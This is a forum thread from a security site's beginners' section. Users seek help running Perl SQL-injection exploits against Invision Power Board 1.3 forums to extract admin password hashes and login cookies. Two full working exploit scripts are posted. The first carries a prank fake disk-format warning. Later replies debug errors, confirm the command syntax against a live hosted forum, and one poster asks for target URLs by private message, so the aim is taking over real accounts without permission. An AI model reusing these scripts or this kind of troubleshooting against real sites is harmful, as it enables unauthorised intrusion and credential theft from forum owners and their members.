 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| |
|
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9145
 People Online:
 Visitors: 621
 Members: 0
 Total: 621
|
|
|
|
|
|
PacketStorm News |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
IPB exploit hash help. |
|
 Posted: Fri Dec 28, 2007 4:30 pm |
 |
|
| Sarkos |
| Beginner |
 |
| |
| Joined: Dec 28, 2007 |
| Posts: 1 |
|
|
|
 |
|
 |
|
Hello there.
For the past few hours I've been trying to retrieve an Admin's password from a IPB forum.
It's ver. 1.3Final
I've been using this code:
| Code: | #!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "The type of the file system is NTFS.\n\n";
print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";
print "DRIVE C: WILL BE LOST!\n";
print "Proceed with Format (Y/N)?\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
# milw0rm.com [2005-05-26] |
However, when I set it up;
| Code: | | C:\Perl\Bin>Hack.pl http://z1.invisionfree.com/forums/************/ 222 1 |
I always receive the hash as 0's
I've tried multiple users but they all come up as 0's
Got any ideas on what the problem is and how to fix it?
Thanks.
EDIT: I've used numerous other codes as well, but I won't list them unless requested, since most of them show errors. |
|
|
|
|
|
|
|
|
| Posted: Fri Dec 28, 2007 4:52 pm |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Maybe target is patched? You know, whats's your best option? Get needed IPB version from somewhere and install in your home PC. And then try exploit(s) locally. And after you have been successful in hacking your own website(s), then try remote targets in real world. This can save you from lot's of frustration  |
|
|
|
|
| Posted: Wed Jan 09, 2008 8:20 am |
|
|
| lmaoqwerty |
| Regular user |
|
| |
| Joined: Jan 06, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| Same problem I get too. Apparently, v1.3 final is not available for download any longer. If it is, could you please find the link for me waraxe? |
|
|
|
|
|
|
|
|
| Posted: Wed Jan 09, 2008 11:50 am |
|
|
| pexli |
| Valuable expert |
 |
| |
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
For IPB version 1.3 and 1.3.1 final
| Code: | #!/usr/bin/perl
## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
use IO::Socket;
if (@ARGV < 4) { &usage; }
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];
$pass = ($target)?('member_login_key'):('password');
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}
sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute
targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)
e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
);
exit();
} |
|
|
|
|
|
|
|
|
|
| Posted: Thu Jan 10, 2008 12:46 am |
|
|
| lmaoqwerty |
| Regular user |
|
| |
| Joined: Jan 06, 2008 |
| Posts: 11 |
|
|
|
|
|
|
|
| Koko, that's the exploit I have been using, and if you had actually read what waraxe said, he was saying that we should download IPB v1.3 FORUM and install on our computer. But I said I cannot find it and he should give me the link. Do you know where the link is? |
|
|
|
|
| Posted: Thu Jan 10, 2008 9:30 am |
|
|
| pexli |
| Valuable expert |
|
| |
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Why test this script local if works a 100% of all IPB there i tested. |
|
|
|
|
| Posted: Fri Feb 15, 2008 9:26 am |
|
|
| Suteki |
| Beginner |
|
| |
| Joined: Feb 15, 2008 |
| Posts: 1 |
|
|
|
|
|
|
|
| koko wrote: | | Why test this script local if works a 100% of all IPB there i tested. |
I get the error "Can't use an undefined value as a symbol reference on line 129"
That line contains:
| Code: | | printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", |
Any help? |
|
|
|
|
| Posted: Fri Feb 15, 2008 1:11 pm |
|
|
| pexli |
| Valuable expert |
|
| |
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Suteki send me URL in PM. |
|
|
|
|
| Posted: Fri Feb 15, 2008 7:40 pm |
|
|
| ggggg |
| Regular user |
|
| |
| Joined: Feb 15, 2008 |
| Posts: 7 |
|
|
|
|
|
|
|
i would like some help also, i have tried not only that code but a few, each containing a new way to get the pass, but i can't seem to make them work.
i have perl, the comands are good (i think), the codes are similar to this one and i have used this one.
usually i put ipb.pl http\\:z7.inv....... \.........\ 1 0
no luck, i remove the space it gives an error at a line, i put space it does nothing.
i would like some help as i am tired of using exploits that i don't know if they work or not. |
|
|
|
|
| Posted: Fri Feb 15, 2008 9:10 pm |
|
|
| pexli |
| Valuable expert |
|
| |
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Feb 15, 2008 9:29 pm |
|
|
| ggggg |
| Regular user |
|
| |
| Joined: Feb 15, 2008 |
| Posts: 7 |
|
|
|
|
|
|
|
2 exploits show either a "can't connect" or "can't use an undefined value.........at line 134"
do you want the link so you can try? beleive me, i can't |
|
|
|
|
| Posted: Sat Feb 16, 2008 7:29 am |
|
|
| Vexer |
| Beginner |
|
| |
| Joined: Feb 16, 2008 |
| Posts: 1 |
|
|
|
|
|
|
|
| im using the code that you provided koko and i keep getting the same error over and over "Can't use an undefined value as a symbol reference on line 129" Any suggestions? |
|
|
|
|
| Posted: Thu Feb 21, 2008 10:10 am |
|
|
| James9r9r |
| Regular user |
|
| |
| Joined: Feb 21, 2008 |
| Posts: 7 |
| Location: hghdg |
|
|
|
|
|
|
Here ya go
DOWNLOAD:
Edited to work with new mysql...
I don't know why there are all 0,0,0,0,0,0,0,0,0,0's I have the same problem, then on some forums that are v1.3 Final I actually get a hash. Maybe the ones that you just get all 0's are patched |
|
|
|
|
| Posted: Sun Mar 30, 2008 2:05 am |
|
|
| Translash |
| Beginner |
|
| |
| Joined: Mar 30, 2008 |
| Posts: 2 |
|
|
|
|
|
|
|
OK so if lets say the site is z15.invisionfree.om/********/
Would the syntax be
[name of script].pl z.15.invisionfree.com /********/ 1 0
I dont know what they mean by folder where IPB is installed. This is for Koko's script, cuz I think it has the potential to work on IPB 1.3 final but I do not know how to harness it. |
|
|
|
|
| Posted: Sun Mar 30, 2008 7:57 am |
|
|
| pexli |
| Valuable expert |
|
| |
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Code: | | [name of script].pl z.15.invisionfree.com /********/ 1 0 |
Exactly. |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2 Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
